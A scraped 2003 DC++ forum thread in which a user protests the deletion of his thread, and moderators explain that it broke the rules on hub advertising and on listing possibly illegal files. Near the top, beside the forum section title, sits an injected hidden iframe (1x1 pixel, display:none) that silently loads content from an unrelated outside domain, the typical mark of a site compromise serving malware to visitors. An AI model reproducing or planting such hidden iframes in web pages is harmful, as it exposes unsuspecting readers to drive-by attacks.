What???

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

Giacomo Yakuzzi

What???

Post by Giacomo Yakuzzi » 2003-12-22 17:31

Some (paranoid) people in this forum should try to check the dictionary for the words OFF - TOPIC. And also ADVERTISING.

Was I advertising myself in my first post? Well.... NO.

Im trying simply to get essential informations I just don`t seem to be finding anywhere else. That is why I came here.

Well, anyway,
no wonder I see just a few posts here, I bet the para-"whatever" cut`em all away.

In the OFF-TOPIC forum people should be allowed to post their... lets say - OFF-TOPIC comments. This points to some kinda freedom.

If you are telling us what to write in the TOPIC forums and also in the OFF-TOPIC forums, then I guess you should be opening an OFF-OFF-TOPIC forum where we could write about things that really interest US, and not just you.

------------------------------------------------------------------------------------
The World is coming to an end...
...but I`m not paranoid, so I guess I`ll stay logged on.

TheParanoidOne
Forum Moderator

Re: What???

Post by TheParanoidOne » 2003-12-22 18:13

Giacomo Yakuzzi wrote:Some (paranoid) people in this forum should try to check the dictionary for the words OFF - TOPIC. And also ADVERTISING.
There is no need to be passive/aggressive. I am fully aware of the meaning of those two terms.
Giacomo Yakuzzi wrote:Was I advertising myself in my first post? Well.... NO.
No, you were not advertising "yourself". You were advertising a hub and encouraging others to advertise hubs. There is a strict "No hub advertising" rule here, as you will see if you read the section titles.
Giacomo Yakuzzi wrote:Im trying simply to get essential informations I just don`t seem to be finding anywhere else. That is why I came here.
What kind of essential information? The only information it seemed you wanted was hubs (already covered) and a list of people who want to upload from you. I would hardly call either of those "essential". Unless there was something I missed?
Giacomo Yakuzzi wrote:Well, anyway,
no wonder I see just a few posts here, I bet the para-"whatever" cut`em all away.
If you spent any time here, you would know that this is not the case.
Giacomo Yakuzzi wrote:In the OFF-TOPIC forum people should be allowed to post their... lets say - OFF-TOPIC comments. This points to some kinda freedom.
I am attempting to ensure that the posts here abide by the given rules. In what way am I imposing on your "freedom"?
Giacomo Yakuzzi wrote:If you are telling us what to write in the TOPIC forums and also in the OFF-TOPIC forums, then I guess you should be opening an OFF-OFF-TOPIC forum where we could write about things that really interest US, and not just you.
Has it occurred to you to ask *why* the thread was closed? Whether or not you want to know, or even care, I will tell you. I do not want you to publish a list, here, of potentially copyright protected and illegal files and advertising them as available to others. This may cause legal trouble for yourself as well as the owner of this forum. I cannot speak for the other moderators, but I believe they would agree with me.
Giacomo Yakuzzi wrote:The World is coming to an end...
...but I`m not paranoid, so I guess I`ll stay logged on.
Did you make a "paranoid" joke there? I think you made some elsewhere as well. They were subtle, but I think they were there. :roll:
You made a joke about my nick. Kudos to you. You must feel so proud.

In future, if you have a comment to make, at least have the curtesy to address the appropriate person correctly and ask *why* an action has been taken, rather than making baseless accusations.

Thank you.
The world is coming to an end. Please log off.

DC++ Guide | Words

Xan1977
Forum Moderator

Post by Xan1977 » 2003-12-22 18:21

The thread you started was titled "Post subject: Write some good "secret" hubs - here!". I deleted it for the reasons that TheParanoidOne stated above. I sent you a PM telling you that I had deleted it. And I answered your PM about why.

GargoyleMT
DC++ Contributor

Post by GargoyleMT » 2003-12-22 20:01

TheParanoidOne wrote:Has it occurred to you to ask *why* the thread was closed? Whether or not you want to know, or even care, I will tell you. I do not want you to publish a list, here, of potentially copyright protected and illegal files and advertising them as available to others. This may cause legal trouble for yourself as well as the owner of this forum. I cannot speak for the other moderators, but I believe they would agree with me.
This board is for the support of DC++: problems, suggestions, and general talk about the DC community. It is not a warez board. (i.e. I agree 100%.)

Giacomo, you're plenty welcome here. Chalk your first two posts up to inexperience, realize that TheParanoidOne isn't flaming you, and move on.

joakim_tosteberg
Forum Moderator

Post by joakim_tosteberg » 2003-12-23 01:32

TheParanoidOne wrote:Has it occurred to you to ask *why* the thread was closed? Whether or not you want to know, or even care, I will tell you. I do not want you to publish a list, here, of potentially copyright protected and illegal files and advertising them as available to others. This may cause legal trouble for yourself as well as the owner of this forum. I cannot speak for the other moderators, but I believe they would agree with me.
Yepp, agreeing.